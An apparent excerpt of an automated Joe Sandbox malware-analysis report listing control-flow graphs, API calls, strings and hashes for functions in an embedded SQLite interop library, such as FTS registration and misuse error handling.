108->109 109->107 114 6c4459d6-6c4459e8 call 6c4859e0 SI45d842f2d2322061 113->114 115 6c4459cd-6c4459d1 call 6c4de180 113->115 119 6c445a07-6c445a0e call 6c4de180 114->119 120 6c4459ea-6c4459ef 114->120 115->114 125 6c445a13-6c445a23 call 6c448b00 119->125 121 6c4459f0-6c4459f6 120->121 123 6c445a6c-6c445a6e 121->123 124 6c4459f8-6c4459fb call 6c43e2c0 121->124 123->119 126 6c445a70-6c445a82 call 6c47c890 SI45d842f2d2322061 123->126 129 6c4459fd-6c445a05 124->129 128 6c445a28-6c445a33 call 6c446ad0 125->128 126->71 134 6c445a84 126->134 128->71 129->119 129->121 134->125
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000297BD,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,4407E41B,?,?,?,?,?,?), ref: 6C4455D0
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C4456E8
                                                                                      • SI45d842f2d2322061.SQLITE.INTEROP(00000000), ref: 6C445A48
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I45d842f2d2322061.I950480ab972e108d.Ifc350ae509dc2b53.
                                                                                      • String ID: 9Pl$%s at line %d of [%.10s]$89Pl$BINARY$NOCASE$RTRIM$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$main$misuse$temp$#Ql
                                                                                      • API String ID: 1428162638-1829368454
                                                                                      • Opcode ID: 51dcdabd6169b33f3ceebcee3b52ff37f743200e59494e3b872d5a5a689294a0
                                                                                      • Instruction ID: a3e8935b2bf2dab6ec75ec018a3ab06136e3d9c65b420b2cc9d9013c29f99779
                                                                                      • Opcode Fuzzy Hash: 51dcdabd6169b33f3ceebcee3b52ff37f743200e59494e3b872d5a5a689294a0
                                                                                      • Instruction Fuzzy Hash: 0AE1D2B0A00B409BFB11CB24CC45F9B77E1EF45319F24892CE8999BB81DB75E449CB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43E2C0 Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 151COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • SI70e4ec628dd7e188.SQLITE.INTEROP(?,snippet,000000FF), ref: 6C43E3A6
                                                                                      • SI70e4ec628dd7e188.SQLITE.INTEROP(?,offsets,00000001), ref: 6C43E3C0
                                                                                        • Part of subcall function 6C446FA0: SI1c7a7970970b9619.SQLITE.INTEROP(?), ref: 6C447014
                                                                                      • SI70e4ec628dd7e188.SQLITE.INTEROP(?,matchinfo,00000001), ref: 6C43E3DA
                                                                                      • SI70e4ec628dd7e188.SQLITE.INTEROP(?,matchinfo,00000002), ref: 6C43E3F0
                                                                                        • Part of subcall function 6C446FA0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00029383,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C4859F0,00000000,MATCH,00000002,00000000,6C4459DD), ref: 6C447069
                                                                                      • SI70e4ec628dd7e188.SQLITE.INTEROP(?,optimize,00000001), ref: 6C43E406
                                                                                        • Part of subcall function 6C464590: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00023562,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,6C40D2D0,?,6C40CFD4,?,?,0000001C,00000000,6C40D080), ref: 6C4645D4
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C43E467
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I70e4ec628dd7e188.$I950480ab972e108d.$I1c7a7970970b9619.Ifc350ae509dc2b53.
                                                                                      • String ID: fts3$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                      • API String ID: 417704478-301646057
                                                                                      • Opcode ID: e6a9180f74cb471056c3ee813a407e2ac125440ae2d29c5c0aacdd3d2296c834
                                                                                      • Instruction ID: 1f1c8b444bcb7d5012a9d3f2d03de7a59b406bc8cddb6bdc8611b2d8dea7b813
                                                                                      • Opcode Fuzzy Hash: e6a9180f74cb471056c3ee813a407e2ac125440ae2d29c5c0aacdd3d2296c834
                                                                                      • Instruction Fuzzy Hash: AA41E661F4522023D610E2232C81F9B66994BE876EF185638FE1CFBF86F75A9C1541E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4D1320 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 467COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 723 6c4d1320-6c4d1388 724 6c4d14bc-6c4d14be 723->724 725 6c4d138e-6c4d1397 723->725 726 6c4d13fd-6c4d1424 724->726 727 6c4d14c4-6c4d14c6 724->727 725->726 728 6c4d1399-6c4d139b 725->728 730 6c4d187a-6c4d187c 726->730 731 6c4d142a-6c4d1439 call 6c4e1bb0 726->731 727->726 729 6c4d14cc-6c4d14db 727->729 728->724 732 6c4d13a1-6c4d13a3 728->732 733 6c4d14dd-6c4d14ec call 6c4e1bb0 729->733 734 6c4d14ee-6c4d14f0 729->734 735 6c4d187e-6c4d1884 call 6c4e1a20 730->735 736 6c4d1887-6c4d1892 730->736 731->730 749 6c4d143f-6c4d1486 call 6c3d2790 731->749 737 6c4d13a6-6c4d13ab 732->737 742 6c4d14f3-6c4d14f5 733->742 734->742 735->736 737->737 743 6c4d13ad-6c4d13b7 737->743 742->736 746 6c4d14fb-6c4d1513 742->746 747 6c4d13b9-6c4d13cb call 6c4e1bb0 743->747 748 6c4d13e0-6c4d13e2 743->748 757 6c4d1515-6c4d151b 746->757 758 6c4d1533-6c4d1535 746->758 747->736 759 6c4d13d1-6c4d13de call 6c3e5590 747->759 750 6c4d13e5-6c4d13e7 748->750 761 6c4d148c-6c4d14a1 call 6c3e5590 749->761 762 6c4d1612 749->762 750->736 753 6c4d13ed-6c4d13f6 call 6c4de230 750->753 753->726 757->758 763 6c4d151d-6c4d1530 757->763 766 6c4d1538-6c4d153d 758->766 759->750 775 6c4d15e8 761->775 776 6c4d14a7-6c4d14b7 call 6c3e5590 761->776 768 6c4d161c-6c4d161e 762->768 763->758 766->766 771 6c4d153f-6c4d154d 766->771 772 6c4d163c 768->772 773 6c4d1620-6c4d163a call 6c3e5590 768->773 777 6c4d1550-6c4d1555 771->777 774 6c4d1646-6c4d1648 772->774 773->774 779 6c4d165a-6c4d166d 774->779 780 6c4d164a-6c4d164f 774->780 782 6c4d15e9-6c4d1610 call 6c3e5590 775->782 776->782 777->777 783 6c4d1557-6c4d156d 777->783 789 6c4d173f-6c4d1758 779->789 790 6c4d1673-6c4d1676 779->790 780->779 785 6c4d1651-6c4d1657 call 6c4e1a20 780->785 782->768 787 6c4d156f 783->787 788 6c4d15a6-6c4d15ae 783->788 785->779 795 6c4d1570-6c4d1575 787->795 798 6c4d15d6-6c4d15e7 call 6c4e1a20 788->798 799 6c4d15b0-6c4d15b9 788->799 796 6c4d175e-6c4d1774 call 6c4d23c0 789->796 797 6c4d1844-6c4d184b 789->797 790->789 793 6c4d167c-6c4d169b 790->793 810 6c4d169e-6c4d16bc 793->810 803 6c4d1578-6c4d157d 795->803 796->797 818 6c4d177a-6c4d17a1 call 6c4d73b0 796->818 805 6c4d184d-6c4d1856 797->805 806 6c4d185c-6c4d1879 call 6c4d6560 call 6c4e1a20 797->806 799->726 800 6c4d15bf-6c4d15d0 call 6c4450b0 799->800 800->726 800->798 803->803 811 6c4d157f-6c4d158d 803->811 805->806 810->797 817 6c4d16c2-6c4d16c9 810->817 816 6c4d1590-6c4d1595 811->816 816->816 823 6c4d1597-6c4d15a1 816->823 821 6c4d16cf-6c4d16d8 817->821 822 6c4d16cb-6c4d16cd 817->822 824 6c4d17a6-6c4d17ae 818->824 827 6c4d16da-6c4d16dc 821->827 822->827 823->795 826 6c4d15a3 823->826 824->797 830 6c4d17b4-6c4d17de 824->830 826->788 828 6c4d16de-6c4d16f1 call 6c4d32c0 827->828 829 6c4d1700-6c4d171e call 6c4444e0 827->829 828->829 839 6c4d16f3-6c4d16fd 828->839 840 6c4d1739-6c4d173c 829->840 841 6c4d1720-6c4d1737 call 6c4444e0 829->841 833 6c4d17e7-6c4d180d call 6c4d32c0 830->833 834 6c4d17e0 830->834 843 6c4d180f-6c4d1813 833->843 844 6c4d1815-6c4d1819 833->844 834->833 839->829 840->789 841->796 841->840 849 6c4d1825-6c4d1843 call 6c4d5020 843->849 846 6c4d181b-6c4d181f 844->846 847 6c4d1821 844->847 846->847 846->849 847->849
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C4D15D7
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,00000000,?), ref: 6C4D1652
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,?,?,00000000,?), ref: 6C4D1868
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,00000000,?), ref: 6C4D187F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID: -journal$immutable$nolock
                                                                                      • API String ID: 223094752-4201244970
                                                                                      • Opcode ID: 324b2e1eec0b1599f8abeec6e73949a49e287addd103670ae8b490fd37b351e9
                                                                                      • Instruction ID: 174a49df53cba2d2392c182b75d0f417894cb6ee95963b0eab8206c3aeebca2a
                                                                                      • Opcode Fuzzy Hash: 324b2e1eec0b1599f8abeec6e73949a49e287addd103670ae8b490fd37b351e9
                                                                                      • Instruction Fuzzy Hash: 4CF1F1B1A003058BDB10DF68C860FEABBF1AF45328F19426DEC6A97B41D735E905CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4B6950 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 83COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 852 6c4b6950-6c4b695b 853 6c4b695d-6c4b6963 852->853 854 6c4b6964-6c4b6968 852->854 855 6c4b696a-6c4b699b call 6c4dedf0 * 2 854->855 856 6c4b699c-6c4b69a1 854->856 858 6c4b69ad-6c4b69b4 856->858 859 6c4b69a3-6c4b69aa 856->859 861 6c4b69ca-6c4b69d4 858->861 862 6c4b69b6 858->862 859->858 863 6c4b69dd-6c4b69e4 call 6c4b8d10 861->863 864 6c4b69d6-6c4b69db 861->864 867 6c4b69b8-6c4b69bf 862->867 868 6c4b69c1-6c4b69c5 call 6c4b6a20 862->868 870 6c4b69e6-6c4b69f1 call 6c4b88c0 863->870 864->863 864->870 867->861 867->868 868->861 876 6c4b69f3-6c4b69f5 870->876 877 6c4b6a07-6c4b6a1f call 6c4e1120 call 6c4479e0 870->877 876->877 878 6c4b69f7-6c4b69fb call 6c4479e0 876->878 883 6c4b6a00-6c4b6a06 878->883
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with finalized prepared statement,?,?,?,?,6C40E994,?), ref: 6C4B6971
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014B00,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000015,API called with finalized prepared statement,?,?,?,?,6C40E994,?), ref: 6C4B698C
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4B6985
                                                                                      • API called with finalized prepared statement, xrefs: 6C4B696A
                                                                                      • misuse, xrefs: 6C4B6980
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4B6976
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1141695462
                                                                                      • Opcode ID: aa05b1317515591f70fc4592f6d319a8b4373bd6e8078acf8f84cc022d1b1460
                                                                                      • Instruction ID: 547aef2f2cd1829561cde367783a0caca821d7a484b1ed838dc774cd7d7b667d
                                                                                      • Opcode Fuzzy Hash: aa05b1317515591f70fc4592f6d319a8b4373bd6e8078acf8f84cc022d1b1460
                                                                                      • Instruction Fuzzy Hash: 4F11EB3270465417EA04DAA9A880FDEA395DBC0A6EF14453FE508E7F41CB71E80942E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C492A00 Relevance: 9.3, APIs: 6, Instructions: 295COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 885 6c492a00-6c492a19 886 6c492c1b-6c492c20 885->886 887 6c492a1f 885->887 888 6c492c2d-6c492c2f 886->888 889 6c492c22-6c492c2b call 6c482860 886->889 890 6c492a20-6c492a29 887->890 894 6c492c3c-6c492c41 888->894 895 6c492c31-6c492c3a call 6c464110 888->895 896 6c492c4f-6c492c53 call 6c492da0 889->896 892 6c492a2b-6c492a32 890->892 893 6c492a34-6c492a38 890->893 892->893 899 6c492a66-6c492a74 call 6c495d10 892->899 893->899 900 6c492a3a-6c492a53 call 6c4dc340 893->900 894->896 897 6c492c43-6c492c4c call 6c4775a0 894->897 895->896 909 6c492c58-6c492c5c 896->909 897->896 914 6c492a7d-6c492a82 899->914 915 6c492a76-6c492a78 call 6c4a4300 899->915 900->899 911 6c492a55-6c492a63 call 6c4dc2e0 900->911 912 6c492c5e-6c492c60 909->912 913 6c492cb7-6c492cbc 909->913 911->899 919 6c492cae-6c492cb4 call 6c4e1a20 912->919 920 6c492c62-6c492c69 912->920 917 6c492cbe-6c492cc0 913->917 918 6c492d17-6c492d1c 913->918 922 6c492a8b-6c492a90 914->922 923 6c492a84-6c492a86 call 6c4a2ef0 914->923 915->914 928 6c492d0e-6c492d14 call 6c4e1a20 917->928 929 6c492cc2-6c492cc9 917->929 926 6c492d1e-6c492d20 call 6c4a2ef0 918->926 927 6c492d25-6c492d27 918->927 919->913 930 6c492c6b-6c492c74 call 6c4e19d0 920->930 931 6c492c76-6c492c7c 920->931 933 6c492aeb-6c492aef 922->933 934 6c492a92-6c492a94 922->934 923->922 926->927 938 6c492d29-6c492d30 927->938 939 6c492d84-6c492d93 call 6c4e1a20 927->939 928->918 940 6c492ccb-6c492cd4 call 6c4e19d0 929->940 941 6c492cd6-6c492cdc 929->941 930->913 931->919 945 6c492c7e-6c492c84 931->945 943 6c492b51-6c492b56 933->943 944 6c492af1-6c492af6 933->944 946 6c492ae2-6c492ae8 call 6c4e1a20 934->946 947 6c492a96-6c492a9d 934->947 949 6c492d42-6c492d48 938->949 950 6c492d32-6c492d41 call 6c4e19d0 938->950 940->918 941->928 960 6c492cde-6c492ce4 941->960 958 6c492b58-6c492b5f 943->958 959 6c492bb0-6c492bb2 943->959 944->943 953 6c492af8-6c492afa 944->953 954 6c492c96-6c492c9c 945->954 955 6c492c86-6c492c94 945->955 946->933 961 6c492aaa-6c492ab0 947->961 962 6c492a9f-6c492aa8 call 6c4e19d0 947->962 949->939 967 6c492d4a-6c492d50 949->967 970 6c492b48-6c492b4e call 6c4e1a20 953->970 971 6c492afc-6c492b03 953->971 954->919 972 6c492c9e-6c492cac 954->972 955->913 975 6c492b61-6c492b68 958->975 976 6c492ba6 958->976 968 6c492c00-6c492c06 call 6c4e1a20 959->968 969 6c492bb4-6c492bbb 959->969 977 6c492cf6-6c492cfc 960->977 978 6c492ce6-6c492cf4 960->978 961->946 964 6c492ab2-6c492ab8 961->964 962->933 980 6c492aca-6c492ad0 964->980 981 6c492aba-6c492ac8 964->981 983 6c492d52-6c492d66 967->983 984 6c492d67-6c492d6d 967->984 1010 6c492c09-6c492c15 968->1010 985 6c492bc8-6c492bce 969->985 986 6c492bbd-6c492bc6 call 6c4e19d0 969->986 970->943 987 6c492b10-6c492b16 971->987 988 6c492b05-6c492b0e call 6c4e19d0 971->988 972->913 991 6c492b6a-6c492b71 975->991 992 6c492b74-6c492b9b 975->992 995 6c492bad 976->995 977->928 993 6c492cfe-6c492d0c 977->993 978->918 980->946 994 6c492ad2-6c492ae0 980->994 981->933 984->939 997 6c492d6f-6c492d83 984->997 985->968 999 6c492bd0-6c492bd6 985->999 986->1010 987->970 1000 6c492b18-6c492b1e 987->1000 988->943 991->992 992->959 1015 6c492b9d-6c492ba4 992->1015 993->918 994->933 995->959 1006 6c492be8-6c492bee 999->1006 1007 6c492bd8-6c492be6 999->1007 1008 6c492b30-6c492b36 1000->1008 1009 6c492b20-6c492b2e 1000->1009 1006->968 1012 6c492bf0-6c492bfe 1006->1012 1007->1010 1008->970 1013 6c492b38-6c492b46 1008->1013 1009->943 1010->886 1010->890 1012->1010 1013->943 1015->995
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000000,00000000,?,?,?,6C464801), ref: 6C492AE3
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000000), ref: 6C492B49
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000001,00000000), ref: 6C492C01
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000000,00000000,?,?,?,6C464801), ref: 6C492CAF
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000000,00000000,?,?,?,6C464801), ref: 6C492D0F
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000000,00000000,?,?,?,6C464801), ref: 6C492D85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: 7780ab207037b78113390959b2a7f0cd05c2a99275da748c7eb52095a62de8eb
                                                                                      • Instruction ID: 2807e72451d1473cdcf7e62ebf2930585227937b843f9aa2d5d7a1fe0f0da82c
                                                                                      • Opcode Fuzzy Hash: 7780ab207037b78113390959b2a7f0cd05c2a99275da748c7eb52095a62de8eb
                                                                                      • Instruction Fuzzy Hash: 4DB17F716067218BDB35DF28D888FABBBE1BF45709F210A2DC85A87B15DF31A445C782
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C448B00 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 215COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1017 6c448b00-6c448b26 1018 6c448b2f-6c448b39 1017->1018 1019 6c448b28-6c448b2d 1017->1019 1020 6c448b47-6c448b51 1018->1020 1021 6c448b3b 1018->1021 1019->1018 1019->1019 1023 6c448b53-6c448b58 1020->1023 1024 6c448b5a-6c448b66 1020->1024 1022 6c448b40-6c448b45 1021->1022 1022->1020 1022->1022 1023->1023 1023->1024 1025 6c448b6f-6c448b7d 1024->1025 1026 6c448b68-6c448b6d 1024->1026 1027 6c448b7f-6c448b8a 1025->1027 1028 6c448b8b-6c448b92 1025->1028 1026->1025 1026->1026 1029 6c448b94-6c448b9f call 6c4e1a20 1028->1029 1030 6c448ba2-6c448ba8 1028->1030 1029->1030 1031 6c448c86-6c448c88 1030->1031 1032 6c448bae-6c448bb0 1030->1032 1035 6c448c8a 1031->1035 1032->1031 1034 6c448bb6-6c448bc2 1032->1034 1034->1031 1037 6c448bc8-6c448bcd 1034->1037 1038 6c448c8c 1035->1038 1039 6c448bcf-6c448bd6 1037->1039 1040 6c448c1a 1037->1040 1041 6c448c93-6c448cbd 1038->1041 1043 6c448bd8 1039->1043 1044 6c448bda-6c448be4 1039->1044 1042 6c448c1c 1040->1042 1045 6c448d55-6c448da0 1041->1045 1046 6c448cc3-6c448cc5 1041->1046 1047 6c448c1f-6c448c25 1042->1047 1043->1044 1050 6c448bf4 1044->1050 1051 6c448be6-6c448be8 call 6c4e1bb0 1044->1051 1048 6c448ce5-6c448d04 1046->1048 1049 6c448cc7-6c448cc9 1046->1049 1052 6c448c27-6c448c2d 1047->1052 1053 6c448c2f-6c448c35 1047->1053 1056 6c448d26-6c448d54 1048->1056 1057 6c448d06-6c448d08 1048->1057 1054 6c448cd0-6c448ce3 1049->1054 1058 6c448bf6-6c448bfd 1050->1058 1062 6c448bed-6c448bf2 1051->1062 1059 6c448c3d-6c448c6e call 6c3e51a0 * 2 1052->1059 1060 6c448c37 1053->1060 1061 6c448c70-6c448c72 1053->1061 1054->1048 1054->1054 1063 6c448d10-6c448d24 1057->1063 1064 6c448c01-6c448c03 1058->1064 1065 6c448bff 1058->1065 1059->1041 1060->1059 1061->1035 1067 6c448c74-6c448c84 call 6c3e51a0 1061->1067 1062->1058 1063->1056 1063->1063 1064->1042 1068 6c448c05-6c448c18 1064->1068 1065->1064 1067->1038 1068->1047
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C448B9A
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C448C44
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C448C63
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C448C7D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Ifc350ae509dc2b53.
                                                                                      • String ID: (ZDl
                                                                                      • API String ID: 3023421017-4126692569
                                                                                      • Opcode ID: 4c3bf20fbe2a2f1260fbf8a887d7d066536094b970ea421924805cd39f4eda28
                                                                                      • Instruction ID: 017c6534eb7dff0eac114f6308a169a6ffb2d94a5089f5ac8df11d186e0d5dd7
                                                                                      • Opcode Fuzzy Hash: 4c3bf20fbe2a2f1260fbf8a887d7d066536094b970ea421924805cd39f4eda28
                                                                                      • Instruction Fuzzy Hash: 317149B1601B059FE714CF79C894F97BBE5EB89309F24852EE86AC7750DB319504CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C447390 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 193COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1075 6c447390-6c4473a4 1076 6c44758e-6c4475ac call 6c4dedf0 1075->1076 1077 6c4473aa-6c4473b1 1075->1077 1083 6c4475b1-6c4475b7 1076->1083 1079 6c4473b3-6c4473b5 1077->1079 1080 6c4473bb-6c4473cc 1077->1080 1079->1076 1079->1080 1080->1076 1082 6c4473d2-6c4473e4 1080->1082 1082->1076 1084 6c4473ea-6c4473f3 1082->1084 1084->1076 1085 6c4473f9-6c447405 call 6c4de230 1084->1085 1085->1076 1088 6c44740b-6c447427 1085->1088 1089 6c44742d 1088->1089 1090 6c4474ae 1088->1090 1091 6c447434-6c447439 1089->1091 1092 6c4474b3-6c4474c9 call 6c48ae30 1089->1092 1093 6c44743b-6c44746c call 6c447390 1089->1093 1090->1092 1091->1092 1098 6c44750d-6c447511 1092->1098 1099 6c4474cb-6c4474d3 1092->1099 1093->1083 1100 6c447472-6c4474a3 call 6c447390 1093->1100 1102 6c447517-6c447523 call 6c48ae30 1098->1102 1103 6c447513-6c447515 1098->1103 1099->1098 1101 6c4474d5-6c4474db 1099->1101 1100->1083 1111 6c4474a9-6c4474ac 1100->1111 1101->1098 1105 6c4474dd-6c4474e4 1101->1105 1112 6c447528-6c44752f 1102->1112 1103->1102 1108 6c447585-6c44758d 1103->1108 1109 6c4474e6-6c447501 call 6c4de020 1105->1109 1110 6c447502-6c44750b call 6c4b6ff0 1105->1110 1110->1102 1111->1092 1115 6c447531-6c44753a 1112->1115 1116 6c44753b-6c447549 call 6c4483e0 1112->1116 1121 6c44754d-6c447583 1116->1121 1122 6c44754b 1116->1122 1121->1108 1122->1121
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002926F,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,?,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4475A4
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C44759D
                                                                                      • unable to delete/modify user-function due to active statements, xrefs: 6C4474E6
                                                                                      • misuse, xrefs: 6C447598
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C44758E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
